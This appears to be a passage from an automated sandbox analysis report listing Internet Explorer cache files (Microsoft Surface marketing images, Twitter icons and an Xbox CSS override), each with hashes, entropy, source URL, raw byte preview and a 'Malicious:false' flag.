                                                                                                                                                                                                              SSDEEP:96:diVvOaVJ+S6DGA4QjS6J5QQxJ2ObsfWpdPy9hI0ms1wcsHTVnAGbGZwUKSN/fkQJ:+aDLzJJ0WbP0hIcbshnxEwFk
                                                                                                                                                                                                              MD5:EAB97F1E05C681EDEBFBF5CDD4C7A2CF
                                                                                                                                                                                                              SHA1:18624AC419D5AB861ACB263D86C07F0CAF6E74EE
                                                                                                                                                                                                              SHA-256:3526FAB911417245FF7C499CC42CF652FE643EA18D6682B29A9824339406CBC7
                                                                                                                                                                                                              SHA-512:B2F97AAE355272E8AA3D0041F4F409EB096DCEF2B985354ED49925F67FB194725FF66189847435E282642C7EABE7E26AB3B78D3E2D06369FEC30F3FF4DAD5E2B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWCOYq
                                                                                                                                                                                                              Preview: ......Exif..II*.................Ducky.......K......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c006 79.164753, 2021/02/15-11:52:13 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:202B1AF49BD411EB9CE7E39644881D7E" xmpMM:InstanceID="xmp.iid:202B1AF39BD411EB9CE7E39644881D7E" xmp:CreatorTool="Adobe Photoshop 2021 Macintosh"> <xmpMM:DerivedFrom stRef:instanceID="E3E523E857D546A663DBD574EEE1DAC9" stRef:documentID="E3E523E857D546A663DBD574EEE1DAC9"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RWlwWJ[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 40 x 40, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):835
                                                                                                                                                                                                              Entropy (8bit):7.694876150482858
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:+TdPfbGKInPMP2dxSG+zFAT3qZaB/eTb0IChlniuVs0uU:+TRf6PvdxpiuqEICniu20j
                                                                                                                                                                                                              MD5:63E685C2429EAD070F0CD73766A55EAD
                                                                                                                                                                                                              SHA1:215FC1B30FCD866690673A8F692FC08AD168CDD0
                                                                                                                                                                                                              SHA-256:0F65CC4366FA0624419A14D6CA3FDE453B3EBC55FD7F71D1D0FED28E4E73DD3F
                                                                                                                                                                                                              SHA-512:6969612A2BD465848948E63193D9FBA92576A7F550975F1581652744FBC47B07815509080E0DD2CC84D16588B38AD1DF6F5B67149C129E2CE26028D06127FF6D
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RWlwWJ?ver=a1b0&q=90&m=6&h=40&w=40&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: .PNG........IHDR...(...(.....&.p.....orNT..w.....IDATH...]h.U...i.C.E..J%..........[$.X5..'..)....*h.ht......].f..%^T"..5sk...5.s......7._w}.....}...p~.S_S.l..B..vxV..i....(48.c....=.\w5....*m./....h.Q&.o.z..<}..+tZ8d.!...%..^c..e[/.z...#M0.tS.k....3.I...C.K...x...KB.B.]....?&.';.....p....O.j....4..".@.....W..d.%..>5..+.r..C.*..\UR..R.F..C.+.Hs;7Y'..A......%.A.R.Q.....E..8'.Q-.*,.|9_. .v'....n..x.)s.R..R.......w&....x/...M...2..)%m..\..v.$.e....d...4...........l..s>..F;oG.y.&.g.....fs..)c.0....7........b...%...^..r.t....om.u.L........j...A+}&.m.I..mi.9.^...!..l......'8...0T...(....Z.....'.#..a..E.....[...S....5..j..P.C`..Y...O.H%.....J...M..7..p. T&.K.....px/.....'..9p.&..;].'2H.....d."........U`......7V.3)..I..F.~E.z...V.".6O.5.....;f."...q.L...P.[.......b...2......f{.......IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\RWzV6z[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1259x472, frames 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):133063
                                                                                                                                                                                                              Entropy (8bit):7.973145301082935
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:S1C6/vmz+PTFeP/3l3jm/y4SK0M+H5TRgHD+LCQ:oC6Gz+PTFeP/3lTQP0LT2HD+LCQ
                                                                                                                                                                                                              MD5:2F4A806F1C8BED36E4A77FC1DFA7B2D0
                                                                                                                                                                                                              SHA1:8796FE31C7063CF2A77306EF073564DBB1636C77
                                                                                                                                                                                                              SHA-256:D9372735E68B4C97E18EC34E1A40CF7F480F436CE55D895DA3FFA1AF294745A8
                                                                                                                                                                                                              SHA-512:03A84D14032857912BC21EB6C2285918BD2A19ACE7895360ABA70849832ACD11F7AE37C00DAA879CD6B3786C617248B172087428829D94583630941BD4A1B914
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......JFIF.....`.`......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222....................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.......N.|...,..E....Wb...K.w&.Rq..m5!q.`P a....>....c.J..cI..bbn..J.F.w..MC`Y....P.=i\..=j[...h..J.E.%8.........r.h....[...,.tB7./(..p85....Y....#.......pFG..J.h....F2s.{..Q..........l...in.,.E;.:..j..5!.....z.....H.@..Te..".:..c.O..52W.-..z..b...\..].8.O@..A..%L...9...?.d.....7....S.i...4Z.uzd.(@c.....7..W.I..Z...J.W.j.cJ..f ..G..#.9n..Kw.q.....r1._....E!..o"...P.f4..{.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Surface_Home_Hero_20_mosaic_Book3_SingleTile_V2[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1067x1204, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):58053
                                                                                                                                                                                                              Entropy (8bit):7.533535899344126
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:jHDpL9XyoEM9oVf+FD5PPQ0RYukdpJoAr2TAr:TDp8HYoVfgA0ap/2Ti
                                                                                                                                                                                                              MD5:EB0EAC625C2D1D8393985978AD929786
                                                                                                                                                                                                              SHA1:097AFA66C015526F9EE47C197F55126F1E780B9E
                                                                                                                                                                                                              SHA-256:520B0AFDED6D818CD7A8AC6BC99A7BEB3BB55711CA79196C8BD48F7112D6DAE5
                                                                                                                                                                                                              SHA-512:C64E19C3E00FB7368FD873B1BF7E7DB9872995070FC40239601F668FFBE992AB749A492B2EA1ABDF500ABF6E44BCA8F1407DCD143FC6B5CF756502086D6E4DA4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Hero_20_mosaic_Book3_SingleTile_V2.jpg?version=8f322e33-582d-30a2-ffaa-4ce4b60775e4
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................+...............................................................................................................................................................................................................................................................................................]..............J,.......M&.G..h.......S................x..].5..>.U....j.6.Z.f../;{{d..............~y.E.v..f..|+...E.6mY....^................t[.n.V.[.f.{T\........... ............Q.?.9...r2.rr....s.s2.U.........8..............._....QM4.....'..Z.....3@...............TQE..M4.D .x#......................>...h.)."..~<.+.................K...(..i..b"".Q.~.....................t.sQE.QM4......(xo.=.X.............>....QE..M4.1......>...d...................h..i..b""....Lx..(.................h..)...........>....{0............<w..*i..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Surface_Home_Mosic_Fall_20_Duo_en-us_V2[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1067x1204, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):110892
                                                                                                                                                                                                              Entropy (8bit):7.84635961999939
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:hzNYmYN5FcaiCGXWVepzrCmuMwtWQwLdilT56ALTkFlXPo7hHcJ9jgmmq:hzNYmYNHPiCiWkzrC+jL4lTw//wtIMq
                                                                                                                                                                                                              MD5:A6546766F19A898FE69B7AC27BFAA8AC
                                                                                                                                                                                                              SHA1:F5F98B45F64877D0FE91EB317AF9997364CCBE59
                                                                                                                                                                                                              SHA-256:A62911AEA3880C924C9530E34736DA99226B29088B5CA6F18219231751C38015
                                                                                                                                                                                                              SHA-512:979E594938743560CC48A6006C310F6C692DFE205CAA15E93E2F0450A5E4C9821021410A81F9354F206DC265CAF97FE4CE81D902FD2AA75BCE121EDB0CA336CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Mosic_Fall_20_Duo_en-us_V2.png?version=54fef09d-3825-faa1-e9e1-5906428db7d4
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................+.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Surface_Home_Mosic_Fall_20_Go_2_en-us_V2[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1067x1204, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):94353
                                                                                                                                                                                                              Entropy (8bit):7.8167488874049305
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:aohR9R1TrtJS0cxEJpExWJ3hY/nMo32LNVW2CktxrLhnpS/Gy35vCnE7jXkvspMe:DR93lISpExwhYUo3222CktxBIuMuE30q
                                                                                                                                                                                                              MD5:11BA6D29A728585580E807C37E51EA01
                                                                                                                                                                                                              SHA1:9C2757D46F8D74D5117BD385DB837109E64F5BA1
                                                                                                                                                                                                              SHA-256:CC1FC0EBE7AE8D07C0EB31AD206DEEFC84E9BE9D4AB2F1E9DDA7203DEFDCD033
                                                                                                                                                                                                              SHA-512:115B1C7E2B36732A60958A40EF2DB3157F71CDF36B957E1AEF19D0CA6C6890DDC703D2C9B2B3F263FA62EABB42CCDEB20E4D7A035585372665CCF5EC328315D9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Mosic_Fall_20_Go_2_en-us_V2.jpg?version=a950fc18-6ad0-9471-d101-70059cb3769d
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................+................................................................................................................................................................................................?(.-.!\...@.....W.~...............D...2q....}.............p..9.....~.&....^~..`........>z.G}..@.......|.G.............8..>?...{.........%..J... .]..............K....`.......g.......O.|...r@.......x..........>k...~.}....,~|yO....dT.........K....`.......W.....~......{.........p_............4.M.H....#....w/...m.......8/.N...|........?'6...Cwl........:........<.$?_............'h.4.#.g..O.1....9.@.........!..............'h.3....?.1.>..9.@.........!.............7.....C.........Gz........|.......LSLDD ........'../...l.F...'....s...........K.K..b..".....D@.......((.1...l.F...'....s...........K._.H..b)......... ..@.|.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Surface_Home_Mosic_Fall_20_LaptopG_en-us_V2[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1067x1204, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):58433
                                                                                                                                                                                                              Entropy (8bit):7.6256639778743995
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:14m3nvh0e/0vzGEmLnkvJxnB+5Pqqu+AvkwvdyMZpsx3WoudamFam2uU+:vaz5mLmBKCtdyMZpsx3G4m2uU+
                                                                                                                                                                                                              MD5:70C368372892A024EA4CE7B27E8F169A
                                                                                                                                                                                                              SHA1:D36BCE769DCEC2496426A28BB1634BB735E82A2F
                                                                                                                                                                                                              SHA-256:8792B1D4BECBB667179E4C55FA4B7F5CCC97E984B3B4AA7AE19FB44BC813EB5C
                                                                                                                                                                                                              SHA-512:F909B0497055C657F4523DBF0EE6F4EDF5B130F904B7A0FECCCF12588471B9B68F681BC7B84FBA5BB8849E5238AB8EE7A5DB2F291BFA471AE061C0F6E32EF7C7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Mosic_Fall_20_LaptopG_en-us_V2.jpg?version=66aa72f1-33a1-112d-3853-bfa1abfe9767
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................+........................................................................................................................................................................................................................................................................................................................................................................................................i./JV...&mh...............r.kZV..)JR.A3k^.2e.x...............V..+JR..)Lt.:S.:c...l..7C..............+Z..)J.)Lt.:c.:c....).................4..+JR..:S.)...Lt.....?k.............yiZ..)\t.)Lt.Jc.:c.<t.<t.:S..R...............iJ..)JR..Jc.Lt.Lt.<t.:R.................+JV..)JR..Jc.1..1..1..Jc.. ..............+JV..)JS.)...Jc.:S.)...:S.................J..)JR..Jc.1...:R..JSc.k..............JV..)Jc.:R..Jc.1...JR...............F.R
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Surface_Home_Mosic_Fall_20_Pro_7_en-us_V2[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1067x1204, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):84455
                                                                                                                                                                                                              Entropy (8bit):7.77136423116986
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:z3yDuUDFJO8WFT8ps+qHXQEgp6EqbD3dcJBvNmVMNv1yY6f7OSEg:z3yDPDbIQpL+X26gMG1yYIYg
                                                                                                                                                                                                              MD5:29CD928A7759977814463142E1743CBA
                                                                                                                                                                                                              SHA1:70E37BB64A815DC96BF1D17F26AFA82DCBC95BE2
                                                                                                                                                                                                              SHA-256:0DAAD443F33F70CD837A58DF57CFB2977C57970BBA95873A6DEABF2D6008EFDB
                                                                                                                                                                                                              SHA-512:1D09BB444571747717A4E0E02D367973194CAF49D2B5D1AFBC18AD50A7ACC77A6AF00B34A72F1F7C3742473ED4A7108CC1950C9860AB1C7E920A8959E8BF3B60
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Mosic_Fall_20_Pro_7_en-us_V2.png?version=6c0adf39-24f3-f078-1f7c-5024b798b7a4
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................+............................................................................................................................................................................................................................................................................................................................................................................................................................................................].\.f......95@..............>P...80...'-.;Wm....v...;gk.|.T..................of<...pb....|..~_.v..._h.}..v...y...................mkL.fB.x5.u0`....8.K...r.............J...mkM..)...~R.J..:V.....~..P.................Z.i...P...V..+JV..+Zv..|..........H....../.8~.kM.3i..DV+Z..+J...g. .....W........+.....]|...~......{..v..Zm6L..V+X.+ZV..k^c......\w..p.o........./..p.cg>|..3.g.>_
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Surface_Home_Mosic_Fall_20_Studio_2_en-us_V2[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1067x1204, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):65223
                                                                                                                                                                                                              Entropy (8bit):7.654821000346925
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:owa5TqsH9Rk5gw0PQE5pcx66V7sGFXsqR/Se/voVMQ7pryXHdo9MahGMn8jMHBa0:IzH9RkCKt9seSe/vKlgran8zIcijYeZ
                                                                                                                                                                                                              MD5:5B7962F8382200712B20A18026AB88D3
                                                                                                                                                                                                              SHA1:61D43D9EC3785CD4831CC44C3532E5F580B26195
                                                                                                                                                                                                              SHA-256:0E6E7B32EBBCFA08DD1E10F08B5CC5CAE44B5715FF6C088CB726F3B2E191AC91
                                                                                                                                                                                                              SHA-512:885D9AC6B62F9FE6E49B309F1D44E7BC3FC0FF05CBF7985452779EE7518223EABC41B9A606FEE72B94AB58CA69775D48CDDDAF5589FCCF7349A8C0B89E0D730C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Mosic_Fall_20_Studio_2_en-us_V2.jpg?version=baee2e89-216e-2abc-0a9c-736048910609
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................+....................................................................................................................................................................................................................................................................................................................}$...I(..b.IP.......s.E;.......W.....X..XX..h.@.),RYD...N@......mw$.K.dR..,Y`....a}...................Y@...../.~........8.._.>..,,(..**Q(EK).)**.e.O....<................).T...,.BT.e.,YH.U.....................*.E.P.Q,...)..T..}g........p..F.x=..,...e.Yb...*X*..K*YS/.]k.. .....p?.>.x=......YH....".......g.......8.._....R.%.*TT.Ie........e.K.{..[.......p..>>......@T...!`.....b.U...T.................{.HT....YR.R.B.`T...2...S.............c.....R*.....P...).*..J.|R._..o........_.z0....%......b.T..,P.).R.R._.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Surface_Home_Mosic_Fall_20_prox_en-us_V2[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1067x1204, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):63548
                                                                                                                                                                                                              Entropy (8bit):7.671112778180409
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:8Uh4Q5CgIBCw7RYOw/8NhPzkrWxn0XOFMj9W2ckm:8Uh4Q5CVCoRYOw/KmCIkYckm
                                                                                                                                                                                                              MD5:BA155B87BB69F066D9680807546EB0F6
                                                                                                                                                                                                              SHA1:9D03B33EE42E202BE4F0DD256FB537521B067157
                                                                                                                                                                                                              SHA-256:3B3EDB8EA36632AC8E1DD0A968CADA29D23B7E8D945CDDF2062BCA157926EE35
                                                                                                                                                                                                              SHA-512:4F4881CA5EBE2DE413D051EDC1F5DAABEB60BF514ED5832236C43AD0BCECA75F9D6E76EA1F4BEF94658B10C6CC960D4976CBC6BD8E279A8BAB561CA24A14C431
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Mosic_Fall_20_prox_en-us_V2.jpg?version=6e558777-a774-ffde-1c71-4b10336b7d7a
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................+........................................................................................................................................................................................................................................................................................................................................)P.................Y.]..Y...................Z.o.....................y.#......................2..;.}k...........y..u.g....._.......3.................?.t{O..Z.._]..w.......x...a..........7...8.*.jJ.....3....G.>s.i.w.;..........r\&Wc..q1-...............;/..P...........-gg..}-.c...`ku...@....._..`}G.H...............y.....:..............0...z'..V..j...............^..oOz.E...........|..h.gtY..Y.].i.w3r............=m|g...".E..u4.......x..U.}..X8.\..+%j................~.....2/..s..}.....w.Z],.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Surface_Home_Mosic_Spring_21_BS_color_V2[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1067x1204, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):63402
                                                                                                                                                                                                              Entropy (8bit):7.646554757635543
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:6pjWQOjJNwcNnAQAsi/rGUx+D21mE9cTw:6pS1ndAQFiDGpDYmE9uw
                                                                                                                                                                                                              MD5:A02FEB2551527C6A2C9172894762BCE4
                                                                                                                                                                                                              SHA1:2089DCBDD30A8201578061C2F50B373786A6B1C9
                                                                                                                                                                                                              SHA-256:8BCFF365A3C2FF0E724C116C965D9CC5814B778C0A3D97A281AAA3DD0978744E
                                                                                                                                                                                                              SHA-512:198B6E3ACEB3960A3BA7420015657BEAE70A666D661459377F058683233973EEFC30AF0C7117BAB8F6F05D64D5098A1DCAA44030794568833B777A8520112222
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://c.s-microsoft.com/en-us/CMSImages/Surface_Home_Mosic_Spring_21_BS_color_V2.jpg?version=1d3808d0-131a-8d23-05fc-ed64de87784c
                                                                                                                                                                                                              Preview: ......JFIF........................................................................................................................................................+.....................................................t........................................................................................................................................................................................................................................................................................................................................................................................................................................................#.r6...........5.n..z'F...z%.@...?!...!...o..6............}...^..:/H.z62U.W.....?.}.n.l.q..E.{...+..........G.....:7F...u.,.2.YCw.vo.C.......|.....r.#]T........~.+.s..v........W.tn..7F..+.jY.1[8.|.d.].......f...k.=..`.......d..+..m}=-..?..t444tt....;.s......j...t...:?G.=CB...1.k.............s.a.3.fR.w..u.....?.w..)c...5.4..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Twitter-high-contrast[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 25 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):382
                                                                                                                                                                                                              Entropy (8bit):7.154744109996273
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPeReheBmKkvouNgZXWnATY6/iVpqSFkV3CxInVDFarmYRRd9/eEbQsvfpgF:6v/72kFFjsY6/iTeNCenVD4rvRESf693
                                                                                                                                                                                                              MD5:56F12253C608C315703E16CB103B0EE2
                                                                                                                                                                                                              SHA1:5620A53D167F81F44200A9E522662972275669B6
                                                                                                                                                                                                              SHA-256:B97F1390080D6F405C86AF4C00F87E5A2B460DA827273C6D6E1D5370AEAEF705
                                                                                                                                                                                                              SHA-512:9F65381781761A1AD1AA8F0CA0671070378B9591B259E54D74555C27D4909C60A0CB6C831EA5810A6604900278202C25A0B1D812D5F3C63DB17A98FCC3045E5A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/6edf9aa7/office.testdrive/images/social/Twitter-high-contrast.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.............xw......pHYs...3...3.RZ.....0IDAT8..U.q.0.}.._6(#d.f.lPF`..AF..t.l.t...N..rR. .....l.=...D...8.z"*."s..<..K;C.L9x.$..+r... .[...._....9rd......H...ks._.5..<$.E........Td.n]..H.........l..q...ye..>T2.n.c...*...ZQ.>hS..T.(........i>....$0=g).).=..l....}...Z..T}..r2F.fr....'........v.......Lz..s.O..n.m....x|...ObGW.......JP1.#q....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Twitter[2].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):369
                                                                                                                                                                                                              Entropy (8bit):7.156142843233795
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPUFR/vE7UZnVcNbYP9RqPCLzLmAhd8UBVTyyuhowJctIvKnqhQiqbWFkqCF:6v/7i/XqNbYPuPCUUju+wytIvKnqhdqB
                                                                                                                                                                                                              MD5:93CA1A80FFCE09717DFFCE31F46C6AD3
                                                                                                                                                                                                              SHA1:39E9F6103A283006234A4FBB63616298C4F99574
                                                                                                                                                                                                              SHA-256:02AC1C1A2BF961E85B8D3B4038DC18D781C3162C441871114001D3E2A357D565
                                                                                                                                                                                                              SHA-512:B10A7C31FD53570A852C19509DC9E977F74B0516399E32FA48D6818EFB51DC6EF2EDC61C55BEAC70870C05FEE719CEA707ABFE82F6E49BCDCB44C54CF2AFFB83
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/_h/10609c90/office.testdrive/images/social/Twitter.png
                                                                                                                                                                                                              Preview: .PNG........IHDR.....................sRGB.........gAMA......a.....IDAT8O..?K.a...B.'.1pihj1.....ADhls.....'...Z|.5..H..{.. T4..Q......y'n~..q...<.'g.=F.C.}.p.4b8.6.2^....1T|Z.H.l@..%.P........A.f....6....M...^.....S.`...."......u...=...^.x.....=..~...4..k...&.y...*C..e.j.K..I......-...&&o9.:~.-.;G.jG./..........|%Np.W.@..F..[.b.s.1.0f...A0.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\UhfMwfOverrides[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):748
                                                                                                                                                                                                              Entropy (8bit):4.868082023135126
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:JKUt2O5UGyVduOB5bVmyVbyV+u8bZyV3fB7yvyVRGyVkcBA4lHyVdg2EZ:JKUtDOV8sbVnVeVJVNVFVRP4V2
                                                                                                                                                                                                              MD5:E91225CF0449809491E58724DB97329D
                                                                                                                                                                                                              SHA1:6C7A5F2288F76C4DF8035603F26A69A48873DD04
                                                                                                                                                                                                              SHA-256:ED5BC9E3233C363EB313E8208867CFDEDB188C012F0660B9AF45A6FD784EA571
                                                                                                                                                                                                              SHA-512:E51DBF8929520B593335723987DC963A4A58859AB86C76AFD3C75662FE41EE01F09B0AF6F9C910973EF982F789E88AE676D62A7CF286ECAB71029F04E319D4E6
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.xbox.com/bundles/UhfMwfOverrides?v=kJx0j-t7cNiHsN_h0yR1lKXO12UiMFMKonWmLXehXs01
                                                                                                                                                                                                              Preview: .c-search button{min-width:34px!important}#headerUniversalHeader a{font-weight:normal!important}.c-universal-header .c-logo.f-image:before{content:none!important}.c-search input{font-size:15px!important;line-height:normal!important}.c-universal-header{line-height:normal!important}.c-universal-footer li{margin-bottom:0!important;font-size:11px!important}.c-universal-footer .c-heading-4{font-family:SegoeUI,"Helvetica Neue",Helvetica,Arial,sans-serif}.c-universal-footer a{font-weight:normal!important}.c-universal-header>div:first-child .c-action-trigger.glyph-shopping-cart{padding-left:7px;padding-top:0;height:46px;width:40px;margin:2px 0 0 5px;min-width:1px;color:rgba(0,0,0,.6)}.c-universal-header .c-me img{vertical-align:inherit!important}
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\a4-539297[1].js
